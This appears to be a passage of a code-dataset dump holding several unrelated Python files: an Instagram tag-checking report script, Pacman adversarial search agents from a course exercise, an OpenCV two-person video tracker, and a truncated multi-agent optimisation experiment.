user\n bad_users[user][\"num\"] = 1\n bad_users[user][\"proof\"] = []\n bad_users[user][\"proof\"].append(post['post'])\n\nmadiaid_code = {}\n# [PROOF] Convert media id to link\nfor u in tqdm(bad_users, desc=\"Конвертация\"):\n id = bad_users[u][\"username\"]\n try:\n username = followers_id_name[id]\n except KeyError:\n username = bot.get_username_from_user_id(id)\n followers_id_name[id] = username\n bad_users[u][\"username\"] = username\n proofs_link = []\n for post_id in bad_users[u][\"proof\"]:\n try:\n code = madiaid_code[post_id]\n except KeyError:\n media_info = bot.get_media_info(post_id)\n code = media_info[0]['code']\n madiaid_code[post_id] = code\n proofs_link.append(post_link + code)\n bad_users[u][\"proof\"] = proofs_link\n\n# Saving usernames dict\nf = open('usernames.txt', 'w')\nfor u in followers_id_name:\n try:\n f.write(u + ':' + followers_id_name[u] + '\\n')\n except TypeError:\n print(\"Cant write {}:{} in followers.txt\".format(u, followers_id_name[u]))\nf.close()\n\n# Export results in file\ndate = datetime.today().strftime(\"%d.%m.%Y %H;%M\")\nresult_filename = date + '.txt'\nf = open('../tags/' + result_filename, 'w')\nf.write(\"Отчет по фото со мной\\n\")\nf.write(\"Сгенерирован {}\\n\\n\".format(date))\n\nfor u in bad_users:\n f.write(\"{} - {} пропусков.\\n\".format(bad_users[u]['username'], bad_users[u]['num']))\n for proof in bad_users[u][\"proof\"]:\n f.write(proof + '\\n')\n f.write('\\n\\n')\nf.close()\n\nconsole_print('\\n\\tКоличество аккаунтов не выполнивших условия: {}\\n'.format(len(bad_users)), color='purple')\nconsole_print('Результаты сохранены в файле {}\\n'.format(result_filename), color='purple')\ninput(\"\")\n","sub_path":"check_tags.py","file_name":"check_tags.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304390160","text":"import math\nfrom util import manhattanDistance\nfrom game import Directions\nimport random, util\n\nfrom game import Agent\n\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n\n The code below is provided as a guide. You are welcome to change\n it in any way you see fit, so long as you don't touch our method\n headers.\n \"\"\"\n def __init__(self):\n self.lastPositions = []\n self.dc = None\n\n\n def getAction(self, gameState):\n \"\"\"\n getAction chooses among the best options according to the evaluation function.\n\n getAction takes a GameState and returns some Directions.X for some X in the set {North, South, West, East, Stop}\n ------------------------------------------------------------------------------\n Description of GameState and helper functions:\n\n A GameState specifies the full game state, including the food, capsules,\n agent configurations and score changes. In this function, the |gameState| argument\n is an object of GameState class. Following are a few of the helper methods that you\n can use to query a GameState object to gather information about the present state\n of Pac-Man, the ghosts and the maze.\n\n gameState.getLegalActions():\n Returns the legal actions for the agent specified. Returns Pac-Man's legal moves by default.\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor state after the specified agent takes the action.\n Pac-Man is always agent 0.\n gameState.getPacmanState():\n Returns an AgentState object for pacman (in game.py)\n state.configuration.pos gives the current position\n state.direction gives the travel vector\n\n gameState.getGhostStates():\n Returns list of AgentState objects for the ghosts\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n\n gameState.getScore():\n Returns the score corresponding to the current state of the game\n\n\n The GameState class is defined in pacman.py and you might want to look into that for\n other helper methods, though you don't need to.\n \"\"\"\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n The evaluation function takes in the current and proposed successor\n GameStates (pacman.py) and returns a number, where higher numbers are better.\n\n The code below extracts some useful information from the state, like the\n remaining food (oldFood) and Pacman position after moving (newPos).\n newScaredTimes holds the number of moves that each ghost will remain\n scared because of Pacman having eaten a power pellet.\n \"\"\"\n # Useful information you can extract from a GameState (pacman.py)\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n newPos = successorGameState.getPacmanPosition()\n oldFood = currentGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n\n return successorGameState.getScore()\n\n\ndef scoreEvaluationFunction(currentGameState):\n \"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n\n This evaluation function is meant for use with adversarial search agents\n (not reflex agents).\n \"\"\"\n return currentGameState.getScore()\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. Agent (game.py)\n is another abstract class.\n \"\"\"\n def breaktie(self, actions, gameState):\n food = gameState.getFood()\n #print(\"Length: {}\".format(len(gameState.getFood().asList())))\n # print(gameState.getFood().asList())\n aa = None\n bb = None\n for x in range(food.width):\n for y in range(food.height):\n if(food[x][y] == True):\n if(aa != None):\n bb = [x,y]\n break\n aa = [x, y]\n\n if(bb != None):\n break\n\n # print(\"food position: {}\".format(aa))\n if(bb == None):\n bb = aa\n min_dis = float('+inf')\n min_action = []\n for a in actions:\n dis = manhattanDistance(aa,gameState.generateSuccessor(0,a).getPacmanPosition() )+ manhattanDistance(bb, gameState.generateSuccessor(0,a).getPacmanPosition() )\n if(dis < min_dis):\n min_dis = dis\n del min_action[:]\n min_action.append(a)\n elif(dis == min_dis):\n min_action.append(a)\n\n return random.choice(min_action)\n\n def __init__(self, evalFn = 'EvaluationFunction_6features', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n\n######################################################################################\n# Problem 1b: implementing minimax\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Returns the minimax action from the current gameState using self.depth\n and self.evaluationFunction. Terminal states can be found by one of the following:\n pacman won, pacman lost or there are no legal moves.\n \n Here are some method calls that might be useful when implementing minimax.\n \n gameState.getLegalActions(agentIndex):\n Returns a list of legal actions for an agent\n agentIndex=0 means Pacman, ghosts are >= 1\n \n Directions.STOP:\n The stop direction, which is always legal\n \n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n \n gameState.getNumAgents():\n Returns the total number of agents in the game\n \n gameState.getScore():\n Returns the score corresponding to the current state of the game\n \n gameState.isWin():\n Returns True if it's a winning state\n \n gameState.isLose():\n Returns True if it's a losing state\n \n self.depth:\n The depth to which search should continue\n \n \"\"\"\n\n def getAction(self, gameState):\n #get all actions pacman can move\n legalMoves = gameState.getLegalActions(0)\n\n #find best action\n max_action = []\n max_val = float('-inf')\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(0, action), self.depth, 1)\n if(eval == max_val):\n max_action.append(action)\n elif(eval > max_val):\n del max_action[:]\n max_action.append(action)\n max_val = eval\n\n if(len(max_action) == 1):\n return max_action[0]\n else:\n return self.breaktie(max_action, gameState)\n\n def minimax(self, gameState, depth, agentIndex):\n #if all ghost's makes a move, this depth is finished\n if(agentIndex >= gameState.getNumAgents()):\n # move to next depth, start with pacman: agentIndex==0\n return self.minimax(gameState, depth-1, 0)\n\n if(depth == 0 or len(gameState.getLegalActions(agentIndex)) == 0):\n #print(\"Get evalution score {}\".format(self.evaluationFunction(gameState)) )\n return self.evaluationFunction(gameState)\n\n legalMoves = gameState.getLegalActions(agentIndex)\n\n if(agentIndex == 0): # if pacman's move\n max_val = float('-inf')\n max_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1)\n\n if(eval > max_val):\n max_action = action\n max_val = eval\n return max_val\n\n else:#if ghost's move\n min_val = float('+inf')\n min_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1)\n if(eval < min_val):\n min_action = action\n min_val = eval\n return min_val\n\n\n\nclass AlphaBetaAgent(MultiAgentSearchAgent):\n\n def getAction(self, gameState):\n #get all actions pacman can move\n legalMoves = gameState.getLegalActions(0)\n #print\n #find best action\n max_action = []\n max_val = float('-inf')\n alpha = float('-inf')\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(0, action),\n self.depth, 1,\n alpha,\n float('+inf'))\n if(eval == max_val):\n max_action.append(action)\n elif(eval > max_val):\n del max_action[:]\n max_action.append(action)\n max_val = eval\n alpha = max(eval, alpha)\n\n if(len(max_action) == 1):\n return max_action[0]\n else:\n return self.breaktie(max_action, gameState)\n\n\n def minimax(self, gameState, depth, agentIndex, alpha, beta):\n if(agentIndex >= gameState.getNumAgents()):\n return self.minimax(gameState, depth-1, 0, alpha, beta)\n\n if(depth == 0 or len(gameState.getLegalActions(agentIndex)) == 0):\n return self.evaluationFunction(gameState)\n\n legalMoves = gameState.getLegalActions(agentIndex)\n\n if(agentIndex == 0): # if pacman's move\n max_val = float('-inf')\n max_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1,\n alpha,\n beta)\n\n if(eval > max_val):\n max_action = action\n max_val = eval\n alpha = max(alpha, eval)\n if(alpha >= beta):\n break\n return max_val\n\n else:#if ghost's move\n min_val = float('+inf')\n min_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1,\n alpha,\n beta)\n if(eval < min_val):\n min_action = action\n min_val = eval\n beta = min(beta, eval)\n if(beta <= alpha):\n break\n return min_val\n\n\n\nclass ExpectimaxAgent(MultiAgentSearchAgent):\n def getAction(self, gameState):\n # Get all legal actions for pacman\n legalMoves = gameState.getLegalActions(0)\n max_action = None\n max_val = float('-inf')\n\n for action in legalMoves:\n eval = self.Expectimax(gameState.generateSuccessor(0, action), 1, self.depth)\n # Finding the max value and return the action\n if(eval >= max_val):\n max_action = action\n max_val = eval\n\n return max_action\n\n def Expectimax(self, gameState, agentIndex, depth):\n # If all agent in current depth has moved\n if(agentIndex >= gameState.getNumAgents()):\n # Moving to the next depth starting with pacman\n return self.Expectimax(gameState, 0, depth-1)\n\n if(depth == 0 or len(gameState.getLegalActions(agentIndex)) == 0):\n #print(\"Get evalution score {}\".format(self.evaluationFunction(gameState)) )\n return self.evaluationFunction(gameState)\n\n\n\n legalMoves = gameState.getLegalActions(agentIndex)\n\n if(agentIndex == 0): # if pacman's move\n max_val = float('-inf')\n sum_score_max = 0\n for action in legalMoves:\n eval = self.Expectimax( gameState.generateSuccessor(agentIndex, action),\n agentIndex+1,\n depth)\n if(eval > max_val):\n max_val = eval\n sum_score_max += max_val\n return max_val\n\n else:#if ghost's move\n min_val = float('+inf')\n sum_score_min = 0\n for action in legalMoves:\n eval = self.Expectimax( gameState.generateSuccessor(agentIndex, action),\n agentIndex+1,\n depth)\n if(eval < min_val):\n min_val = eval\n sum_score_min += min_val\n return sum_score_min/len(gameState.getLegalActions(agentIndex))\n\n\n######################################################################################\n# Problem 4a (extra credit): creating a better evaluation function\n\n\ndef EvaluationFunction_4features(currentGameState):\n\n pacman_loc = currentGameState.getPacmanPosition()\n ghosts_state = currentGameState.getGhostStates()\n\n #print\n \"\"\"1. game score\"\"\"\n evaluation_score = currentGameState.getScore() * 11\n #print(\"Place 1: {}\".format(evaluation_score))\n\n \"\"\"2. distance to the nearest food, the bigger the worse: negative score added\"\"\"\n food = currentGameState.getFood().asList()\n min_dis = float('+inf')\n for f in food:\n dis = manhattanDistance(pacman_loc, f)\n min_dis = min(dis, min_dis)\n\n if(len(food) == 0):\n evaluation_score += 10000\n else:\n evaluation_score -= min_dis * 6\n #print(\"Place 2: {}\".format(evaluation_score))\n\n \"\"\"3. distance to the nearest active ghost, the smaller the worse: positve score added\"\"\"\n scared_ghosts = []\n active_ghosts = []\n min_ghost_dis = float('+inf')\n for ghost in ghosts_state:\n if(ghost.scaredTimer > 0):\n scared_ghosts.append(ghost)\n else:\n active_ghosts.append(ghost)\n dis = manhattanDistance(ghost.getPosition(), pacman_loc)\n min_ghost_dis = min(dis, min_ghost_dis)\n\n #there are active ghosts\n if(len(active_ghosts) != 0):\n # with square we will care about this distance more when the ghost is close.\n evaluation_score += min_ghost_dis * min_ghost_dis * 0.4\n #print(\"Place 3: {}\".format(evaluation_score))\n\n\n\n \"\"\"4. number of food left + number of capsules left\n \"\"\"\n num_food = len(food)\n num_capsule = len(currentGameState.getCapsules())\n evaluation_score -= (num_food + num_capsule) * 10\n return evaluation_score\n\n\ndef EvaluationFunction_6features(currentGameState):\n\n pacman_loc = currentGameState.getPacmanPosition()\n ghosts_state = currentGameState.getGhostStates()\n\n\n \"\"\"1. game score\"\"\"\n evaluation_score = currentGameState.getScore() * 11\n #print(\"Place 1: {}\".format(evaluation_score))\n\n \"\"\"2. distance to the nearest food, the bigger the worse: negative score added\"\"\"\n food = currentGameState.getFood().asList()\n min_dis = float('+inf')\n for f in food:\n dis = manhattanDistance(pacman_loc, f)\n min_dis = min(dis, min_dis)\n\n if(len(food) == 0):\n evaluation_score += 10000\n else:\n evaluation_score -= min_dis * 6\n #print(\"Place 2: {}\".format(evaluation_score))\n\n \"\"\"3. distance to the nearest active ghost, the smaller the worse: positve score added\"\"\"\n scared_ghosts = []\n active_ghosts = []\n min_ghost_dis = float('+inf')\n for ghost in ghosts_state:\n if(ghost.scaredTimer > 0):\n scared_ghosts.append(ghost)\n else:\n active_ghosts.append(ghost)\n dis = manhattanDistance(ghost.getPosition(), pacman_loc)\n min_ghost_dis = min(dis, min_ghost_dis)\n\n #there are active ghosts\n if(len(active_ghosts) != 0):\n # with square we will care about this distance more when the ghost is close.\n evaluation_score += min_ghost_dis * min_ghost_dis * 0.4\n #print(\"Place 3: {}\".format(evaluation_score))\n\n\n #there are active ghosts\n if(len(active_ghosts) != 0):\n # with square we will care about this distance more when the ghost is close.\n if (min_ghost_dis <= 3):\n evaluation_score += min_ghost_dis * min_ghost_dis * 0.4\n #print(\"Place 3: {}\".format(evaluation_score))\n\n\n\n \"\"\"feature 4. distance to neareast scared ghost\"\"\"\n\n min_scared = 0\n for ghost in scared_ghosts:\n dis = manhattanDistance(ghost.getPosition(), pacman_loc)\n min_scared = min(min_scared, dis)\n evaluation_score += 0.8 * min_scared\n\n\n \"\"\"feature 5. number of legal actions\"\"\"\n num_actions = len(currentGameState.getLegalActions(0))\n evaluation_score += 0.4 * num_actions\n\n\n \"\"\"feature 6. number of food left + number of capsules left\"\"\"\n num_food = len(food)\n num_capsule = len(currentGameState.getCapsules())\n evaluation_score -= (num_food + num_capsule) * 10\n #print(\"Place 6: {}\".format(evaluation_score))\n return evaluation_score\n","sub_path":"pacmanAdversialSearch/AdversialSearchAgents.py","file_name":"AdversialSearchAgents.py","file_ext":"py","file_size_in_byte":18570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"163136884","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 10 14:32:12 2016\n\n@author: DennisLin\n\"\"\"\nimport numpy as np\nimport cv2\n#people detection \n#from __future__ import print_function\nfrom imutils.object_detection import non_max_suppression\nimport argparse\n#import imutils\nimport time\nfrom tqdm import tqdm\n#A = np.array([[1,2,3],[4,5,6],[7,8,9]])\n#\n#B = np.array([[1,1,1],[2,2,2],[3,3,3]])\n#\n#A = np.insert(A,0,[0,0,0],axis=0)\ndef unique_rows(a):\n a = np.ascontiguousarray(a)\n unique_a = np.unique(a.view([('', a.dtype)]*a.shape[1]))\n return unique_a.view(a.dtype).reshape((unique_a.shape[0], a.shape[1]))\n\ndef distance(two_window_info, three_window_info):\n three_window_info_tmp = three_window_info.copy()\n haha = ()\n for i in range(two_window_info.shape[0]):\n distance = []\n for j in range(three_window_info_tmp.shape[0]):\n distance_tmp = np.linalg.norm(two_window_info[i]-three_window_info_tmp[j])\n distance.append(distance_tmp)\n distance_array = np.array(distance)\n index = np.where(distance_array == distance_array.min())\n mother = index[0][0]\n haha = haha + (mother,)\n three_window_info = np.delete(three_window_info, haha, axis = 0)\n return three_window_info;\n \n \n \ndef threewindow(record_info_clear_tmp):\n row_limit = record_info_clear_tmp[record_info_clear_tmp.shape[0] - 1,0]\n index_delete = ()\n for i in tqdm(range( row_limit )):\n \n temp = np.where(record_info_clear_tmp[:,0] == i)\n if len(temp[0]) != 0: \n if temp[0].shape[0] == 2:\n two_window = []\n two_window = record_info_clear_tmp[temp[0],:]\n if temp[0].shape[0] == 3:\n my_answer = distance(two_window,record_info_clear_tmp[temp[0],:])\n# print my_answer\n index_tmp = np.where((record_info_clear_tmp[:] == my_answer[0]).all(axis = 1))\n index_delete = index_delete + (index_tmp[0][0],)\n record_info_clear = np.delete(record_info_clear_tmp, index_delete, axis = 0)\n record_info_clear_x1 = (record_info_clear[:,1]*4 + record_info_clear[:,3]*1)/5 \n record_info_clear_x2 = (record_info_clear[:,1]*1 + record_info_clear[:,3]*4)/5\n record_info_clear[:,1] = record_info_clear_x1\n record_info_clear[:,3] = record_info_clear_x2\n return record_info_clear\n\ndef selectwindow(record_info_clear):\n\n checkpoint = 0 #if 0 then a, if 1 then b\n person_A = []\n person_B = []\n# if record_info_clear[0,1] < 130: #initialize\n person_A_temp = record_info_clear[0]\n person_A.append(person_A_temp)\n person_A_info = np.array(person_A)\n person_B_info = np.array([])\n checkpoint = 0\n# elif record_info_clear[0,1] > 130:\n# person_B_temp = record_info_clear[0]\n# person_B.append(person_B_temp)\n# person_B_info = np.array(person_B)\n# person_A_info = np.array([])\n# checkpoint = 1\n [row_record_info_clear,col_record_info_clear] = np.shape(record_info_clear)\n\n \n \n for i in range(row_record_info_clear-1):\n# if (record_info_clear[i+2,0] == record_info_clear[i,0]):\n# \n if (record_info_clear[i+1,0] != record_info_clear[i,0]):\n if checkpoint == 0:\n center_dist = np.linalg.norm((record_info_clear[i+1,1]+record_info_clear[i+1,3])-(record_info_clear[i,1]+record_info_clear[i,3]))\n if center_dist <= 5:\n person_A_temp = record_info_clear[i+1]\n person_A.append(person_A_temp)\n person_A_info = np.array(person_A)\n checkpoint = 0\n elif (center_dist > 5) and (center_dist <= 55):\n record_info_clear[i+1,1:5] = record_info_clear[i,1:5] \n else:\n person_B_temp = record_info_clear[i+1]\n person_B.append(person_B_temp)\n person_B_info = np.array(person_B)\n checkpoint = 1 \n else: \n center_dist = np.linalg.norm((record_info_clear[i+1,1]+record_info_clear[i+1,3])-(record_info_clear[i,1]+record_info_clear[i,3]))\n if center_dist <= 5:\n person_B_temp = record_info_clear[i+1]\n person_B.append(person_B_temp)\n person_B_info = np.array(person_B)\n checkpoint = 1 \n elif (center_dist > 5) and (center_dist <= 55):\n record_info_clear[i+1,1:5] = record_info_clear[i,1:5] \n else:\n person_A_temp = record_info_clear[i+1]\n person_A.append(person_A_temp)\n person_A_info = np.array(person_A)\n checkpoint = 0 \n elif (record_info_clear[i+1,0] == record_info_clear[i,0]):# same frame\n if checkpoint == 0:\n person_B_temp = record_info_clear[i+1]\n person_B.append(person_B_temp)\n person_B_info = np.array(person_B) \n checkpoint = 1\n else:\n person_A_temp = record_info_clear[i+1]\n person_A.append(person_A_temp)\n person_A_info = np.array(person_A) \n checkpoint = 0 \n return (person_A_info, person_B_info)\nAnswerA = np.array([])\nAnswerB = np.array([])\n#record_info_clear = unique_rows(record_info)\n#record_info_clear = np.load('D://senior/CCL/record_info_clear_mask_NMS.npy')\nrecord_info2 = np.load('/Users/DennisLin/record_info_npy/April30_2sentence1_record_info.npy')\nrecord_info_clear_tmp = unique_rows(record_info2)\n###detect three window#####\nrecord_info_clear = threewindow(record_info_clear_tmp)\n\n(AnswerA,AnswerB) = selectwindow(record_info_clear) \n#record_info = np.load('D://senior/CCL/special_topic/record_info.npy')\n#record_info_clear = unique_rows(record_info)\n\ncamera = cv2.VideoCapture('/Users/DennisLin/Videos/April30/April30_2sentence1.mp4')\n\n#load the features\n#row = np.load('D://senior/CCL/special_topic/{April30_2sentence1.mpg}_out_features.npy')\n#[width, length] = row.shape\n#width = int(width)\n#length = int(length)\n\n## initialize the HOG descriptor/person detector\n#hog = cv2.HOGDescriptor()\n#hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\n\n# take first frame of the video\n#(grabbed,frame_old) = camera.read()\n##rame = frame_old[:,:,:]\n#frame = frame_old[:,:,:]\n#r = 400.0 / frame.shape[1]\n#dim = (400, int(frame.shape[0] * r))\n#frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n#(rects, weights) = hog.detectMultiScale(frame, winStride=(8, 8), padding=(32,32), scale=1.05)\n#rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\n#rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\n#pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)\nframe_num = 0\nindex_A = 0\nindex_B = 0\nfirst_AnswerA = AnswerA[0,0]\nfirst_AnswerB = AnswerB[0,0]\n#[row_A,col_A] = AnswerA.shape()\n#[row_B,col_B] = AnswerB.shape()\n\nnumber_A = 0\nnumber_B = 0\nwhile(camera.isOpened()):\n ret, frame = camera.read()\n if not ret:\n break\n r = 400.0 / frame.shape[1]\n dim = (400, int(frame.shape[0] * r))\n frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n print(index_A,frame_num,AnswerA[index_A,0])\n if frame_num == AnswerA[index_A,0]:\n cv2.rectangle(frame,(AnswerA[index_A,1],AnswerA[index_A,2]),(AnswerA[index_A,3], AnswerA[index_A,4]), (0, 255, 0), 2)\n number_A = (AnswerA[index_A,1]+AnswerA[index_A,3])\n index_A = index_A + 1\n [row_A,col_A] = np.shape(AnswerA)\n \n if index_A > row_A-1:\n AnswerA_temp1 = AnswerA[index_A-1,:].copy()\n AnswerA_temp1[0] = frame_num\n AnswerA = np.insert(AnswerA,index_A,AnswerA_temp1,axis = 0) \n elif frame_num < first_AnswerA:\n AnswerA_temp = AnswerA[index_A,:].copy()\n AnswerA_temp[0] = frame_num\n AnswerA = np.insert(AnswerA,index_A,AnswerA_temp,axis = 0)\n index_A = index_A + 1\n elif frame_num > first_AnswerA:\n AnswerA_temp2 = AnswerA[index_A-1,:].copy()\n AnswerA_temp2[0] = frame_num\n AnswerA = np.insert(AnswerA,index_A,AnswerA_temp2,axis = 0)\n cv2.rectangle(frame,(AnswerA[index_A,1],AnswerA[index_A,2]),(AnswerA[index_A,3], AnswerA[index_A,4]), (0, 255, 0), 2)\n number_A = (AnswerA[index_A,1]+AnswerA[index_A,3])\n index_A = index_A + 1\n \n \n if frame_num == AnswerB[index_B,0]:\n cv2.rectangle(frame,(AnswerB[index_B,1],AnswerB[index_B,2]),(AnswerB[index_B,3], AnswerB[index_B,4]), (0, 0, 255), 2)\n number_B = (AnswerB[index_B,1]+AnswerB[index_B,3])\n index_B = index_B + 1\n [row_B,col_B] = np.shape(AnswerB)\n if index_B > row_B-1:\n AnswerB_temp1 = AnswerB[index_B-1,:].copy()\n AnswerB_temp1[0] = frame_num\n AnswerB = np.insert(AnswerB,index_B,AnswerB_temp1,axis = 0) \n elif frame_num < first_AnswerB:\n AnswerB_temp = AnswerB[index_B,:].copy()\n AnswerB_temp[0] = frame_num\n AnswerB = np.insert(AnswerB,index_B,AnswerB_temp,axis = 0)\n index_B = index_B + 1\n elif frame_num > first_AnswerB:\n AnswerB_temp2 = AnswerB[index_B-1,:].copy()\n AnswerB_temp2[0] = frame_num\n AnswerB = np.insert(AnswerB,index_B,AnswerB_temp2,axis = 0)\n cv2.rectangle(frame,(AnswerB[index_B,1],AnswerB[index_B,2]),(AnswerB[index_B,3], AnswerB[index_B,4]), (0, 0, 255), 2)\n number_B = (AnswerB[index_B,1]+AnswerB[index_B,3])\n index_B = index_B + 1\n distance = np.linalg.norm(number_A-number_B)\n# for i in range(AnswerA.shape[0]) :\n# if frame_num == AnswerA[i,0]:\n# cv2.rectangle(frame, (AnswerA[i,1],AnswerA[i,2]), (AnswerA[i,3], AnswerA[i,4]), (0, 255, 0), 2)\n# index_A = index_A+1\n# elif frame_num != AnswerA[i,0] and index_A != 0:\n# cv2.rectangle(frame,(AnswerA[index_A-1,1],AnswerA[index_A-1,2]), (AnswerA[index_A-1,3], AnswerA[index_A-1,4]), (0, 255, 0), 2)\n# for i in range(AnswerB.shape[0]) :\n# if frame_num == AnswerB[i,0]:\n# cv2.rectangle(frame, (AnswerB[i,1],AnswerB[i,2]), (AnswerB[i,3], AnswerB[i,4]), (0, 0, 255), 2)\n# index_B = index_B +1;\n# elif frame_num != AnswerB[i,0] and index_B !=0:\n# cv2.rectangle(frame,(AnswerB[index_B-1,1],AnswerB[index_B-1,2]), (AnswerB[index_B-1,3], AnswerB[index_B-1,4]), (0, 0, 255), 2) \n cv2.putText(frame, \"Frame_index: {}\".format(frame_num), (10, 20),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.putText(frame, \"Distance: {}\".format(distance), (10, 40),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) \n if frame_num > 600:\n cv2.imshow('frame',frame)\n \n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# elif frame_num == 8776:\n# break\n frame_num +=1\n# if frame_num == 8784:\n# break\nnp.save('/Users/DennisLin/AnswerA-21s_v2.npy', AnswerA)\nnp.save('/Users/DennisLin/AnswerB-21s_v2.npy', AnswerB)\n\ncamera.release()\ncv2.destroyAllWindows()\n#np.save('AnswerA.npy',AnswerA)\n#np.save('AnswerB.npy',AnswerB) ","sub_path":"Tracking_people.py","file_name":"Tracking_people.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"308236760","text":"import os\nimport datetime\nimport matplotlib.pylab as plt\nimport seaborn as sns\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom dos.target_functions import *\n\nsns.set()\nresult_dir = os.path.join(os.getcwd(), 'results/' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\nos.makedirs(result_dir)\n\nRUNS = 200\nRANGE = 4\nSTEPS = 200\nRESET_TRADE_STEPS = int(STEPS * 1.)\nSAMPLES = 100\nALPHA = .5\nALPHA_SHARE = .5\nPSI = .25\nINIT_STD = 1.\nMIN_STD = .2\nMIN_STD_SHARE = .2\nN_AGENTS = 4\nNON_SHARING = 1\n\ntarget_functions = {}\nfor i in range(N_AGENTS):\n target_functions[i] = generate_f(N_AGENTS)\n\nvalue_log = []\ntrade_log = []\n\nfor run in tqdm(range(RUNS)):\n for i in range(N_AGENTS):\n target_functions[i] = generate_f(N_AGENTS)\n\n independent_means = {}\n independent_stds = {}\n for i in range(N_AGENTS):\n independent_means[i] = 0.\n independent_stds[i] = INIT_STD\n\n for step in range(STEPS):\n samples = {}\n for i in range(N_AGENTS):\n samples[i] = np.random.normal(independent_means[i], independent_stds[i], size=SAMPLES)\n\n actions = [samples[i] for i in range(N_AGENTS)]\n\n values = {}\n mean_vs = {}\n\n for agent in range(N_AGENTS):\n values[agent] = target_functions[agent](actions)\n v = values[agent]\n mean_vs[agent] = np.mean(v)\n # TODO: log min and mean value\n log = {'run': run, 'type': 'independent', 'step': step, 'mean_value': mean_vs[agent], 'agent': agent}\n value_log.append(log)\n\n sort = sorted(zip(v, samples[agent])) # sorts ascending by value, low values first\n elite = sort[int(len(sort) * PSI):] # elite selection\n\n elite_a = [a for _, a in elite]\n independent_means[agent] = (1. - ALPHA) * independent_means[agent] + ALPHA * np.mean(elite_a)\n independent_stds[agent] = (1. - ALPHA) * independent_stds[agent] + ALPHA * np.std(elite_a)\n independent_stds[agent] = max(independent_stds[agent], MIN_STD)\n\n value = np.sum([mean_vs[i] for i in range(N_AGENTS)])\n log = {'run': run, 'type': 'independent', 'step': step, 'mean_value': value, 'agent': 'joint'}\n value_log.append(log)\n\n action_means = {}\n action_stds = {}\n trade_means = {}\n trade_stds = {}\n\n for i in range(N_AGENTS):\n action_means[i] = 0.\n action_stds[i] = INIT_STD\n trade_means[i] = 0.\n trade_stds[i] = INIT_STD\n\n for step in range(STEPS):\n # reset sharing distribution every RESET_TRADE_STEPS\n if step % RESET_TRADE_STEPS == 0:\n for i in range(N_AGENTS):\n trade_means[i] = 0.\n trade_stds[i] = INIT_STD\n\n # sample from policy p_i for each agent\n samples = {}\n trades = {}\n for i in range(N_AGENTS):\n samples[i] = np.random.normal(action_means[i], action_stds[i], size=SAMPLES)\n trades[i] = np.random.normal(trade_means[i], trade_stds[i], size=SAMPLES)\n\n actions = [samples[i] for i in range(N_AGENTS)]\n\n # evaluate actions and clip trades\n values = {}\n for agent in range(N_AGENTS):\n values[agent] = target_functions[agent](actions)\n trades[agent] = np.clip(trades[agent], 0, values[agent])\n # TODO: Trade target softmax?\n # TODO: How to deal with changing optimal trade?\n\n # trade\n for i in range(N_AGENTS - NON_SHARING):\n values[i] = values[i] - trades[i] + np.mean(\n [trades[j] for j in trades if j != i and j < N_AGENTS - NON_SHARING])\n\n for i in range(N_AGENTS - NON_SHARING):\n log = {'run': run, 'type': 'sharing', 'step': step, 'mean_trade': np.mean(trades[i]), 'agent': i}\n trade_log.append(log)\n\n mean_vs = {}\n\n # update policy p_i for each agent\n for agent in range(N_AGENTS):\n v = values[agent]\n mean_vs[agent] = np.mean(v)\n # TODO: log min and mean value\n log = 